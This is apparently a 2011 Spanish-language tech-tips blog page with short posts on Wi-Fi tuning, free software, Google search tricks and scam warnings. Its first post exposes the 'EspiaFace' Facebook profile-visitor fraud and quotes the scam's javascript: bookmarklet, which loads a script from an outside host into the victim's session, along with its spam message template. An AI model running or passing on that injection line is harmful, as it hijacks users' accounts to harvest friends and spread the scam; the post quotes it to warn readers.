Hace Tus Busquedas Aqui!

Páginas

Articulos Recientes

lunes, 25 de abril de 2011

Fraude en Facebook – Averigua quien visita tu Perfil –EspiaFace

Desde hace unos días se ha propagado en rápidamente en Facebook una supuesta manera de saber quien ha visitado tu perfil, el supuesto servicio viene un sitio fraudulento llamado EspiaFace.com, que aquí vamos a desenmascarar, pues cómo ya había comentado hace tiempo que todas las aplicaciones que te prometen saber quien ha visitado tu perfil en Facebook son una estafa esta nueva aplicación no es la excepción.

Viendo cómo funciona el servicio de EspiaFace.com te pide hacer una serie de cosas para supuestamente instalar el servicio en tu cuenta, para eso tienes que insertar un código en tu muro que tal vez muchos no entienden pero se trata de un simple JavaScript que toma de manera aleatoria algunos de tus amigos de tu cuenta y los coloca con un número de visitas ya predefinido.

El primero código que te pide insertar en la barra de direcciones es el siguiente:

javascript:(a=(b=document).createElement('script')).src='//app.espiaface.com/app.js?'+Math.random(),b.body.appendChild(a);void(0)

En el código anterior lo único que hace es agregar el script de espiaface.com a tu Facebook para poder sacar los nombres de tus amigos.

Después te pide compartir el sitio en tu Facebook, supuestamente para que funcione, esto es lo más bajo que he visto para engañar a un usuario, aquí el único objetivo es propagar el fraude.

Y si lo anterior no fue suficiente te pide llenar una encuesta con la que los dueños del servicio ganan dinero, de nuevo engañando al usuario y si no completas la encuesta no podrás terminar, así que todos los que han caido en el fraude han llenado la encuesta.

Finalmente nos pide publicar el siguiente código en nuestro Facebook:

var postmessage = 'Top de visitantes de tu perfil de hoy:
%tf% - 19 visitas
%tf% - 16 visitas
%tf% - 15 visitas
%tf% - 13 visitas
Averigua tu tambien quien te esta mirando entrando en: espiaface.com
Funciona de verdad!';

En el código anterior lo que dice %tf% es donde se colocan de manera aleatoria nombre de tus amigos que se etiquetan en el mensaje, esto lo puedes comprobar haciendo varias veces el mismo procedimiento, donde siempre van a aparecer nombres diferentes y el mismo número de visitas.

Cómo puedes ver, si sabes algo de JavaScript, puedes ver que el supuesto servicio es un fraude total, y lo peor, es que miles de personas en Facebook creen que es verdad y están etiquetando a sus amigos para propagar el fraude.

Así que si tu también fuiste víctima de ser etiquetado por alguno de tus amigos como uno de los que más visitan su perfil cuando ni siquiera es verdad, comparte este este artículo con ellos para que no crean ese engaño.

Post extraído de Techtástico

Saludos,

Sebastián

sábado, 23 de abril de 2011

Como conseguir una cuenta Premium de GrooveShark

Grooveshark es uno de los mejores servicios que existen ahora en la web, desde mi punto de vista. Para cualquier fanático de la música tiene que estar de acuerdo conmigo, simplemente porque tener un lugar donde escuchar todas las canciones que queramos de forma gratuita es fabuloso.

El lugar ha enfrentado algunos problemas últimamente, como por ejemplo que Google sacó su aplicación para Android del Market porque estaban infringiendo alguna de esas leyes de derechos de autor extremistas que tienen las disqueras, pero siguen siendo un lugar genial, con opciones Premium para disfrutar música en línea desde el ordenador sin publicidad o si es desde el teléfono o dispositivo móvil, escuchar en general porque solo se puede con una cuenta paga. Los planes que tienen son muy económicos, apenas 6$ y 9$ pero si no tienes cómo pagarlos, sea la razón que sea, me acabo de enterar de un truco para tener un mes “gratis” o sin gastar el dinero.

Grooveshark tiene una sección de encuestas y para que los usuarios del lugar las llenen les ofrecen puntos que al acumularlos puedes canjear por otras cosas como un mes de cuenta Premium. En la imagen de arriba ves que con 600 puntos puedes tener una cuenta Grooveshark Plus (la que cuesta 6$ y que te quita la publicidad mientras escuchas en el ordenador) y con 900 puntos un mes de cuesta Grooveshark Everywhere (por 9$ al mes para escuchar música desde un móvil).

Por supuesto, cada encuesta vale 100 o 150 puntos, y tienen al menos 25 preguntas, algunas menos, así que si quieres tu mes de música necesitarás sentarte un buen rato a responder preguntas que quizás a muchos les hagan sentir incómodos, como cuántos carros tienes, tu código postal o tu nivel de estudio.

Pero si no les molesta dejar toda esta información y tienen tiempo para sentarse un rato a responder preguntas de selección simple, pues vayan a este enlace y comiencen.

Vía Techtástico

Saludos,

Sebastián

miércoles, 20 de abril de 2011

Aviary: Editor de audio desde Chrome.

Editar audio sin duda es una tarea que estábamos acostumbrados a realizar por medio de programas de escritorio y para eso hay muchas herramientas gratis para editar audio, pero es algo tedioso para muchos el estar instalando programas de mas en su computadora, o tan solo buscan una herramienta de fácil acceso mediante su navegador, para eso les presento una extensión para Google Chrome.

 

 

Aviary-Editor-de-Audio

 

Aviary es una es una herramienta de edición de audio potente que esta disponible como extensión para Google Chrome, tan facil como instalar y utilizar. Dentro de las capacidades que brinda Aviary  destacan:

    Cientos de efectos de audio.
    Interfaz sencilla animada.
    Importar y exportar en múltiples formatos.
    Compatibilidad con el programa Aviary’s Music Creator.
    Extensas herramientas de edición.

Descarga

Aviary

 

techtastico.com

domingo, 17 de abril de 2011

Todo Fiestas y Suvenires para 15 años – Revistas en PDF

Facil Facil Fiestas - AyudasyTutoriales 15 Años - Especial Souvenirs Utilisima - AyudasyTutoriales

Descarga estas revistas en PDF:

Revista - Todo Fiestas.pdf (7.29 MB)
Revista - Souvenirs para 15 Años.pdf (4.74 MB)

Saludos,

Sebastián

domingo, 10 de abril de 2011

Consejos para optimizar tu conexión Wifi

El fabricante Edimax ha dado a conocer entre sus clientes un decálogo para optimizar la conexión Wifi en los hogares, la mejor conexión para no inundar más de cables nuestras casas.

La revolución Wifi ha llegado a los usuarios domésticos que aprecian sus innumerables ventajas. La más importante y obvia es la eliminación de molestos cableados para conectar nuestros equipos a los routers. La inmensa mayoría de los portátiles integran capacidad wifi al igual que muchos ordenadores tradicionales de sobremesa.

También Wifi permite que nuestros amigos se conecten en casa con su portátil a través de una sencilla contraseña. Todo son ventajas, pero muchas veces la conexión no funciona tan bien como debería. Tras desechar posibles averías por parte del operador que facilita la conexión a Internet, es posible que el router no esté colocado en el sitio más idóneo de la casa. Edimax, un distribuidor muy conocido de soluciones para el ámbito Wifi dispone de un decálogo de consejos para sus clientes, para facilitar las conexiones inalámbricas en el hogar.

 

wifi3

 

 

1. Centro de gravedad. La señal wireless de un router es de 360 grados. Se expande en todas direcciones, reduciéndose a medida que aumenta la distancia o se encuentran obstáculos. Así, lo importante es encontrar el centro de gravedad de la sala para situar el punto de acceso WiFi. Es el mismo donde podríamos una radio si quisiéramos escucharla desde todos los puntos.

2. Situar el router en un sitio abierto, lejos del suelo, de ventanas y muros gruesos; nunca dentro de un mueble o rodeado de artefactos metálicos, ya que estos afectan considerablemente a la señal.

3. Evitar interferencias. El router WiFi tiene tres clases de enemigos: los que retienen la señal (paredes, suelo, muebles...); aquéllos que la modifican (principalmente objetos metálicos); y los que la ‘vampirizan’ (compiten por la señal de nuestro router, y son todos los aparatos inalámbricos que utilicen la frecuencia de 2,4 GHz, como microondas o teléfonos inalámbricos).

4.- La antena. Cuando hay muchos objetos o interferencias en la sala, podemos probar a utilizar una antena de router direccional en lugar de multidireccional. Esto permite orientarla mejor para aprovechar la conexión.

5.- Repetidores. En casos complicados se puede instalar un repetidor, también conocido como amplificador o expansor, para aumentar el radio de cobertura. Se sitúa a mitad de camino entre el router y donde se quiere extender la señal.

6. Mantener el hardware actualizado. Hay que asegurarse de que todos los drivers del router, el firmware de la tarjeta de red y los de PC y Access Point están actualizados. Basta con visitar la web del fabricante y descargar nuevas versiones de software.

7.- Cuidado con los dispositivos Bluetooth. Hay que inhabilitar las conexiones Bluetooth del teléfono, el ratón u otros dispositivos como el mando de la consola Wii mientras no se utilicen, o trasladarlos a otra habitación.

8.- Sintonizar el canal apropiado. Al igual que las emisoras de radio, las antenas WiFi emiten por varios canales. Es bueno probarlos todos hasta encontrar el que tiene menos interferencias (en España suelen ser los canales 1 y 13) y dirigir la tarjeta hacia ese canal.

9.- El último estándar 802.11. Un router que opera con el estándar 802.11g ofrece cuatro veces más potencia (ancho de banda) que si se basa en 802.11b. La tarjeta del PC debe funcionar con el mismo estándar, así que en caso de actualización afecta a ambos dispositivos.

10.- Productos del mismo fabricante. Aunque se pueden utilizar router, tarjetas y Access Point distintos, normalmente se mejora el alcance si son de la misma marca.

 

Fuente:

superhosting.cl

sábado, 9 de abril de 2011

Cómo Añadir FlashPlayer a Firefox Portable

FlashPlayer - Logo - AyudasyTutoriales

Muchas veces los Navegadores portables, en este caso el Firefox que estaba utilizando, no traía FlashPlayer como complemento para utilizar en diferentes páginas como Youtube, Facebook, etc, por lo que estuve buscando y encontré la manera de agregarlo manualmente y les paso a detallar como:

  1. Descargamos este enlace que Contiene el Complemento que necesitamos. Lo guardamos donde podamos encontrarlo fácilmente y continuamos.-
  2. Vamos a necesitar renombrar a .ZIP la extensión del archivo que hemos descargado en el 1° punto (.XPI) y lo extraemos de forma normal.-
  3. De los archivos extraídos en el punto anterior saldrán 2 que utilizaremos: flashplayer.xpt y NPSWF32.dll, a estos vamos a necesitar copiarlos en la carpeta:
    /Donde Tengas Instalado el Firefox Portable/data/plugins
  4. Reinicia FF portable y Listo!

Para los que no lo tengan FF portable lo pueden Descargar desde este Enlace.-

Espero que les útil!

Saludos

Sebastián

domingo, 3 de abril de 2011

Graba tus Emisoras de Radio Preferidas – Sharp-Radio

SharpRadio es un programa para Windows que te permite simplemente de escuchar y grabar radio streaming en formato .MP3 en Internet.

Sharp-Radio - AyudasyTutoriales

Hay muchos Reproductores de Audio que permiten de escuchar radio en Streaming, casi todos, con SharpRadio se puede sólo en Windows, pero es un software que no necesita de instalación, por lo tanto se puede llevar en un Pendrive o Memoria USB, en fin, es un software que permite escuchar y grabar fácilmente.

Para utilizar SharpRadio es suficiente saber sólo la dirección de la radio en streaming, funcionan en ambos enlaces que terminan con la barra (/) y también con las direcciones de Internet que enlazan con lista de reproducción (playlist) por lo tanto que indican los archivo con extensión .pls; añadida la dirección de la radio se puede escuchar, escuchar y grabar, y subir o bajar el volumen, tiene sólo estas características pero que funciona perfectamente incluso siendo un programa aún en versión beta.

Descarga SharpRadio y comienza a grabar tus emisoras (vía: WebUtilidad)

Saludos,

Sebastián

Embebe cualquier tipo de Archivo en tu Blog o Web - Embebedit

Los que somos Blogger o tenemos la responsabilidad de gestionar un sitio web sabemos que hay muchos archivos que no se pueden mostrar en una pagina web en el formato original, al menos por ahora y con los estándares actuales de Internet. Embedit es un servicio Online con el que podremos mostrar toda clase de ficheros multimedia que de otra manera no se podría hacer. Los ficheros que admite son doc, docx, xls, xlsx, ppt, pptx, pdf, wpd, odt, ods, odp,  en ofimática;  png, jpg, gif, tiff, psd, bmp, eps, ai, en diseño gráfico;  y txt, rtf, csv en texto simple.

Para utilizar Embedit no es necesario registrarse y totalmente gratuito, lo único que deberemos hacer es subir el archivo a Embedit y automáticamente nos proveerá de un código que deberemos usar en nuestra web.

Vía Embedit

Embebe cualquier tipo de archivo en tu web es un post de TecnoBita

Saludos,

Sebastián

Mantenimiento a Computadoras Portátiles – PC Práctica

PC Practica - AyudasyTutoriales

PC Práctica, es una serie de fascículos con temas específicos que todos los especialistas en mantenimiento a computadoras y administradores de sistemas deben dominar para su buen desempeño en el mercado laboral.
Cada fascículo es una guía concisa de trabajo, que ofrece soluciones prácticas y la teoría básica del tema en cuestión.
Cada título es independiente de los demás y pueden estudiarse por separado; no obstante, el conjunto de títulos que forman la serie, puede considerarse como una antología básica del mantenimiento a computadoras PC.

En este número de PC práctica, entraremos de lleno al tema de las computadoras portátiles, estudiando su evolución, su tecnología y el mantenimiento especifico a que son susceptibles. Está dirigido a todo persona que ya se ha iniciado en el servicio a computadoras de escritorio y que, por lo tanto, ya está familiarizada con los conceptos básicos de la arquitectura del estándar PC.

Contenido

  1. El Ascenso inminente de las computadoras portátiles
  2. Un poco de historia
  3. Tecnologías utilizadas en las computadoras portátiles
  4. Explorando el interior de una computadora portátil
  5. Mantenimiento a nivel del software
  6. Problemas típicos a nivel de hardware
  7. Algunos casos de servicio

Características de la Descarga:


Formato: .PDF y FLASH
Peso: 14 MB
Idioma: Español

Descarga la Revista PC Práctica – Mantenimiento a Computadoras Portátiles

Saludos,

Sebastián

sábado, 2 de abril de 2011

Administrar todas las funciones del sistema con ManagePC

Conocemos ya varias herramientas para identificar las características de nuestro sistema, pero quisiera resaltar una en especial ya que esta herramienta no se limita en mostrar toda la información de nuestro sistema, incluyendo hardware y software. ManagePc es de quien hablo, una potente herramienta con la que podemos obtener información completa del sistema, desde información de las características de la PC hasta información de los procesos. Una herramienta simple, con tan solo instalarlo y después ejecutarlo el programa comienza a recopilar toda la información y la muestra en forma de pestañas.

  1. En la primera pestaña nos encontramos con la información como Nombre del equipo, marca, numero de serie etc.
  2. Nos encontramos con los servicios que se llevan acabo en la PC
  3. Los procesos que se están ejecutando
  4. Actualizaciones de Windows

Siguiendo con los discos de memoria, programas instalados y aplicaciones que se ejecutan al iniciar la Pc.

ManagePC - AyudasyTutoriales

Descarga ManagePC y conocé toda la información de tu PC (vía: Borest)

Saludos,

Sebastián

Asistencia Remota mucho más fácil con TeamViewer

TeamViewer - AyudasyTutoriales

Compartir el escritorio y trabajar en equipo ahora es más fáciles que nunca:

Con TeamViewer puede comunicarse con el escritorio de un socio en cualquier punto de Internet.

Control remoto de cualquier ordenador a través de Internet:
Con TeamViewer el control remoto de ordenadores a través de Internet es un juego de niños.

Presentaciones remotas y demostraciones de producto:
Muestre a sus socios por Internet su propia pantalla y presente sus soluciones de software, productos y presentaciones.
Transferencia de archivos
TeamViewer posee una transferencia de archivos integrada para copiar archivos de un ordenador a otro. La transferencia de archivos también funciona a través de firewalls.
Novedades:

  • Rendimiento optimizado: Ahora las conexiones TeamViewer son aún más rápidas y estables, especialmente cuando se realizan dentro de la red propia o con la red de otra empresa.
  • Mayor facilidad de manejo: Ahora la navegación será más rápida y fácil. La clara delimitación entre los modos de mantenimiento remoto y presentación abre paso a una mayor facilidad de manejo y presenta un diseño nuevo y más actual.
  • Automático: Ahora TeamViewer restablece la conexión automáticamente después de un reinicio remoto o una actualización.
  • Nuevo idioma: Ahora TeamViewer también está disponible en chino. En conjunto, TeamViewer tiene ya versiones en 19 idiomas diferentes. Y pronto se añadirán nuevos idiomas a la lista.
  • Más seguro: Podrá proteger con contraseña sus opciones de TeamViewer.

Descarga TeamViewer y comienza a Disfrutarlo

Saludos,

Sebastián

Consejos para mejorar tus búsquedas en Google

Funciones de uso diario

Tiempo

Para consultar el tiempo de una ciudad del mundo, escribe "tiempo" seguido de la ciudad, la región y el código postal o bien la ciudad y el país.

Ejemplo:

Funciones Google - 1 - Clima

Resultados deportivos

Reloj

Para ver los resultados y los calendarios de los equipos deportivos, escribe el nombre del equipo o de la liga en el cuadro de búsqueda. STATS, Inc. facilita todos los datos deportivos.

 

Herramientas de referencia

Calculadora

icono de calculadora

Para utilizar la función integrada de calculadora, basta con introducir el cálculo que deseas realizar en el cuadro de búsqueda.

Ejemplo:

Funciones Google - 2 - Calculadora

Conversiones de unidad

icono de bombilla

Utiliza Google para realizar conversiones entre distintas unidades de medida (altura, peso y masa, entre otras). Sólo tienes que introducir la cifra y la unidad en el cuadro de búsqueda y nosotros nos encargamos del resto.

Ejemplo:

Funciones Google - 3 - Conversión

Selección de palabras clave

Definiciones de diccionarios

icono de libros

Para obtener la definición de una palabra o frase, escribe "definir" seguido de un espacio y la palabra o palabras en cuestión. Para ver una lista de definiciones que provienen de distintas fuentes online, escribe "define:" seguido de una palabra o frase. Los resultados mostrarán definiciones para toda la frase.

Ejemplo:

Funciones Google - 4 - Definición

Corrector ortográfico

icono de lupa

El software de corrección ortográfica de Google comprueba automáticamente si los términos de la consulta están escritos con la ortografía más común. Si cree que podrías obtener mejores resultados utilizando otra ortografía, se muestra la frase "Quizás quiso decir: (ortografía más habitual)". Haz clic en la sugerencia ortográfica para ejecutar una búsqueda en Google con ese término.

 

Búsqueda local

Búsqueda local

icono de brújula

Si buscas una tienda, un restaurante u otro tipo de negocio local, puedes realizar la consulta introduciendo la categoría en la que se incluye el negocio y su ubicación para obtener resultados en esa misma página, además de un mapa, reseñas e información de contacto. Por Ejemplo puedes Buscar: Pizza Madrid y encontrar negocios de Venta de Pizzas en tu ciudad.

Cartelera

icono de rollo de película

Para encontrar reseñas y horarios de películas en cines cerca de donde te encuentras, escribe "cine" o el nombre de la película en el cuadro de búsqueda de Google. Si ya guardaste el lugar donde te encuentras mediante una búsqueda anterior, el primer resultado mostrará los horarios de la película en los cines de la zona.

Ejemplo:

Funciones Google - 5 - Cartelera

 

Planificación de viajes

Conversión de moneda

icono de gráfico

Para utilizar nuestro conversor de moneda integrado, basta con introducir la cifra y la moneda de la conversión que deseas realizar en el cuadro de búsqueda y te mostraremos la respuesta directamente en la página de resultados.

Ejemplo:

Funciones Google - 6 - Divisas

Google Maps

icono de mapa

¿Buscas un mapa? Escribe el nombre o el prefijo de una ubicación y la palabra "mapa"; obtendrás un mapa de ese lugar. Haz clic en él para acceder a una versión ampliada en Google Maps.

Ejemplo: Mapa Buenos Aires

 

Cómo mejorar tus búsquedas

Operador +

icono de lupa

Google omite palabras y caracteres comunes, como "dónde" y "cómo", al igual que otros dígitos y letras que ralentizan la búsqueda y no mejoran los resultados. Si una palabra común es imprescindible para obtener los resultados deseados, asegúrate de que no la omitimos añadiéndole el signo "+" delante.

Búsqueda comodín

icono de lupa

A veces, el mejor modo de obtener la información que necesitas es añadir un asterisco (*) al término de búsqueda para que Google busque los términos de búsqueda que desconoces.

Ejemplo: La capital de Italia es *

 

Búsquedas numéricas

Seguimiento de envíos

icono de paquete

Para realizar el seguimiento de un paquete, escribe el número de seguimiento de este (ya sea de UPS, Fedex o USPS) directamente en el cuadro de búsqueda. Obtendrás resultados con enlaces directos que facilitarán la consulta del estado del paquete.

Funciones Google - 7 - Seguimiento de Paquetes

Saludos,

Sebastián

Como Recuperar Archivos Ocultos por Virus en memorias USB

USB Show

Los virus en las memorias USB son algo que no podemos evitar, y casi en cualquier lugar podemos encontramos con estos molestos intrusos; pero que pasa cuando un día queremos abrir algún archivo guardado en nuestra memoria y vaya sorpresa que nos llevamos cuando no tenemos nada en ella, bueno si alguna vez te ha pasado, aquí les daré un herramienta que te puede evitar muchos dolores de cabeza.

Muchos virus tienen el efecto de escondernos y ocultar (“no borran”) lo archivos almacenados en nuestro pendrive y cuando queremos abrirlos pues será difícil encontrarlos si no contamos con ciertos conocimientos, pero para ello existe un gran utilidad que no facilitara esta tarea con unos cuantos clics.

USB Show te permitirá ver los archivos que han sido ocultos por culpa de virus o personas que quieren hacerte un broma, cabe resaltar que solo mostrara archivos si están ocultos, no recuperara archivos borrados o memorias formateadas. Solo basta con ejecutar la aplicación, seleccionar la unidad y dar clic en “Recuperar archivos ocultos” y listo, ya podrás ver tus archivos escondidos.

Además tienes la ventaja de que no debes instalar esta utilidad, es totalmente portable y la puedes llevar a cualquier lugar ya que es muy liviana.

RECOMENDACIONES:

* Después de recuperar sus archivos por favor analicé estos con algún programa antivirus.
* USB Show recuperara todos los archivos ocultos, posiblemente también algún malware es por eso que debe ser usado con mucha precaución.
* USB Show puede ser usado el discos duros o en discos extraíbles.
* Antes de recuperar sus archivos es recomendable que el sistema donde vaya a realizar esta acción no este infectada por algún malware

Descargar USB Show

Saludos,

Sebastián

Curso de Árabe – Ebooks en PDF

Curso de Arabe

Este curso viene en un contenido mas amplio ya que nos permitirá conocer la gramática así como la pronunciación del idioma y como cambia la fonética en cada una de las frases todo en un excelente libro.

Datos Técnicos:

  • Tipo: .PDF
  • Host: GigaSize
  • Idioma: Español
  • Peso: 5 MB

Descarga el Curso de Árabe

Saludos,

Sebastián

MSN & Facebook espía - Correo Basura - SpamLoco

En la siguiente captura se puede ver un correo enviado por uno de esos sitios de quien te admite:


msn-facebook-espia

Como vemos, el mensaje busca llamar la atención a toda costa, al parecer se podría activar la webcam de los amigos para espiarlos, ver los historiales de conversación y hasta desbloquear a los que nos bloquearon.
Obviamente todo esto es mentira, el objetivo es que los usuarios hagan clic en el enlace y luego ingresen su contraseña para tener acceso a toda su lista de contactos y bombardearlos con Spam, de esta forma hacen crecer el sitio con más visitas y promocionan otros productos.
Estos sitios se montan en base a un script gratuito que se loguea en la cuenta del MSN y analiza la lista de contactos, el problema es que desde hace tiempo no se puede saber si nos bloquearon, ni tampoco si nos eliminaron... por lo que estos sitios ya no funcionan.
Además, no ofrecen ningún tipo de seguridad.
¿Cuál es el sitio que promociona este correo basura? no importa, hoy es uno, mañana es otro y pasado será otro diferente... mientras Google les siga dando vida y Microsoft mire para otro lado con este asunto, van a seguir apareciendo clones del quien te admite y los usuarios van a seguir comprometiendo sus cuentas.

Así que por favor, Tomen conciencia y no hagan clic en este tipo de Anuncios, ya que “No todo lo que brilla es Oro”.-

Contenido extraído del sitio SpamLoco

Saludos,

Sebastián

Como recuperar contactos eliminados de GMail

Los contactos en tu cuenta de Gmail son algo muy importante, y es igual de importante mantenerlos actualizados y guardados, pero que sucede cuando los borras por error?
Hay una manera de recuperarlos con la nueva característica de Gmail que te permite restaurar un contacto eliminado hasta por 30 días después de haberlo eliminado, si pasa más tiempo entonces ya no podrás recuperarlo.

Gmail - Restaurar Contactos

Para acceder a esta función en la sección de contactos de Gmail, hay un menú llamado “Más acciones” ahí debes elegir la opción llamada “Restaurar contactos…” y te va a salir un cuadro como el de la siguiente imagen:

Gmail - Restablecer los Contactos

Con esto vas a restaurar todos los contactos eliminado en los últimos días, tu eliges el tiempo, pero la mala noticia es que si has agregado un nuevo contacto se va a borrar pues te regresa tu base de datos de contactos al mismo estado que tenía al día que elegiste restaurarlo.

Esta es una razón más para usar Gmail en lugar de cualquier otro servicio de correo electrónico gratuito.

Saludos,Sebastián

Seguinos en Facebook!

Entradas populares